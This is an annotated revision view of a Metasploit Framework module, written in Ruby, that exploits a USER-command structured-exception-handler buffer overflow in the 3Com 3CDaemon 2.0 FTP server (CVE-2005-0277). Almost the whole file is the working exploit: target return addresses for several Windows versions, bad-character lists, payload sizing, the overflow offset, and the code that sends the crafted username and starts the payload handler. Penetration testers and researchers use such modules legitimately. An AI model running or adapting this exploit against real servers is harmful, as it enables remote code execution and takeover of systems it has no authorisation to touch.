/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb - Annotate - Metasploit Framework - Metasploit Redmine Interface

root / modules / exploits / windows / ftp / 3cdaemon_ftp_user.rb @ master

History | View | Annotate | Download (2.5 kB)

1	abbeb2e8	HD Moore	##
2	d42194e1	Matt Miller	# $Id$
3	abbeb2e8	HD Moore	##
4	abbeb2e8	HD Moore
5	abbeb2e8	HD Moore	##
6	0ea6eca4	Joshua Drake	# This file is part of the Metasploit Framework and may be subject to
7	abbeb2e8	HD Moore	# redistribution and commercial restrictions. Please see the Metasploit
8	abbeb2e8	HD Moore	# Framework web site for more information on licensing and terms of use.
9	37c2e301	kris	# http://metasploit.com/framework/
10	abbeb2e8	HD Moore	##
11	abbeb2e8	HD Moore
12	fb8b56f5	HD Moore	require 'msf/core'
13	973e7d16	HD Moore
14	fd256ec4	HD Moore	class Metasploit3 < Msf::Exploit::Remote
15	ff83f1cd	Joshua Drake	Rank = AverageRanking
16	973e7d16	HD Moore
17	fd256ec4	HD Moore	include Msf::Exploit::Remote::Ftp
18	fd256ec4	HD Moore	include Msf::Exploit::Remote::Seh
19	973e7d16	HD Moore
20	973e7d16	HD Moore	def initialize(info = {})
21	0ea6eca4	Joshua Drake	super(update_info(info,
22	4d76fb86	HD Moore	'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
23	973e7d16	HD Moore	'Description' => %q{
24	0ea6eca4	Joshua Drake	This module exploits a vulnerability in the 3Com 3CDaemon
25	973e7d16	HD Moore	FTP service. This package is being distributed from the 3Com
26	973e7d16	HD Moore	web site and is recommended in numerous support documents.
27	973e7d16	HD Moore	This module uses the USER command to trigger the overflow.
28	973e7d16	HD Moore	},
29	973e7d16	HD Moore	'Author' => [ 'hdm' ],
30	1bffccf6	HD Moore	'License' => MSF_LICENSE,
31	973e7d16	HD Moore	'Version' => '$Revision$',
32	973e7d16	HD Moore	'References' =>
33	973e7d16	HD Moore	[
34	0ab728c6	HD Moore	[ 'CVE', '2005-0277'],
35	973e7d16	HD Moore	[ 'OSVDB', '12810'],
36	973e7d16	HD Moore	[ 'OSVDB', '12811'],
37	973e7d16	HD Moore	[ 'BID', '12155'],
38	973e7d16	HD Moore	[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
39	973e7d16	HD Moore	],
40	973e7d16	HD Moore	'Privileged' => false,
41	973e7d16	HD Moore	'Payload' =>
42	973e7d16	HD Moore	{
43	32d83b8c	HD Moore	'Space' => 674,
44	32d83b8c	HD Moore	'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
45	973e7d16	HD Moore	'StackAdjustment' => -3500,
46	973e7d16	HD Moore	'Compat' =>
47	973e7d16	HD Moore	{
48	973e7d16	HD Moore	'ConnectionType' => "-find"
49	973e7d16	HD Moore	}
50	973e7d16	HD Moore	},
51	0ea6eca4	Joshua Drake	'Targets' =>
52	973e7d16	HD Moore	[
53	0ea6eca4	Joshua Drake	[
54	32d83b8c	HD Moore	'Windows 2000 English', # Tested OK - hdm 11/24/2005
55	973e7d16	HD Moore	{
56	973e7d16	HD Moore	'Platform' => 'win',
57	81a1de75	HD Moore	'Ret' => 0x75022ac4, # ws2help.dll
58	973e7d16	HD Moore	},
59	def6c64a	HD Moore	],
60	def6c64a	HD Moore	[
61	973e7d16	HD Moore	'Windows XP English SP0/SP1',
62	973e7d16	HD Moore	{
63	973e7d16	HD Moore	'Platform' => 'win',
64	81a1de75	HD Moore	'Ret' => 0x71aa32ad, # ws2help.dll
65	973e7d16	HD Moore	},
66	def6c64a	HD Moore	],
67	def6c64a	HD Moore	[
68	973e7d16	HD Moore	'Windows NT 4.0 SP4/SP5/SP6',
69	973e7d16	HD Moore	{
70	973e7d16	HD Moore	'Platform' => 'win',
71	81a1de75	HD Moore	'Ret' => 0x77681799, # ws2help.dll
72	0ea6eca4	Joshua Drake	},
73	973e7d16	HD Moore	],
74	0ea6eca4	Joshua Drake	[
75	45908448	Joshua Drake	'Windows 2000 Pro SP4 French',
76	45908448	Joshua Drake	{
77	45908448	Joshua Drake	'Platform' => 'win',
78	45908448	Joshua Drake	'Ret' => 0x775F29D0,
79	45908448	Joshua Drake	},
80	2d5be3df	fab	],
81	0ea6eca4	Joshua Drake
82	973e7d16	HD Moore	],
83	973e7d16	HD Moore	'DisclosureDate' => 'Jan 4 2005'))
84	973e7d16	HD Moore	end
85	973e7d16	HD Moore
86	973e7d16	HD Moore	def check
87	973e7d16	HD Moore	connect
88	0ea6eca4	Joshua Drake	disconnect
89	973e7d16	HD Moore	if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
90	973e7d16	HD Moore	return Exploit::CheckCode::Vulnerable
91	0ea6eca4	Joshua Drake	end
92	32d83b8c	HD Moore	return Exploit::CheckCode::Safe
93	973e7d16	HD Moore	end
94	973e7d16	HD Moore
95	973e7d16	HD Moore	def exploit
96	973e7d16	HD Moore	connect
97	0ea6eca4	Joshua Drake
98	973e7d16	HD Moore	print_status("Trying target #{target.name}...")
99	10a95de4	HD Moore
100	d42194e1	Matt Miller	buf = rand_text_english(2048, payload_badchars)
101	0ea6eca4	Joshua Drake	seh = generate_seh_payload(target.ret)
102	81a1de75	HD Moore	buf[229, seh.length] = seh
103	81a1de75	HD Moore
104	08e3078d	HD Moore	send_cmd( ['USER', buf] , false )
105	0ea6eca4	Joshua Drake
106	973e7d16	HD Moore	handler
107	3783e27f	HD Moore	disconnect
108	973e7d16	HD Moore	end
109	973e7d16	HD Moore
110	0ab728c6	HD Moore	end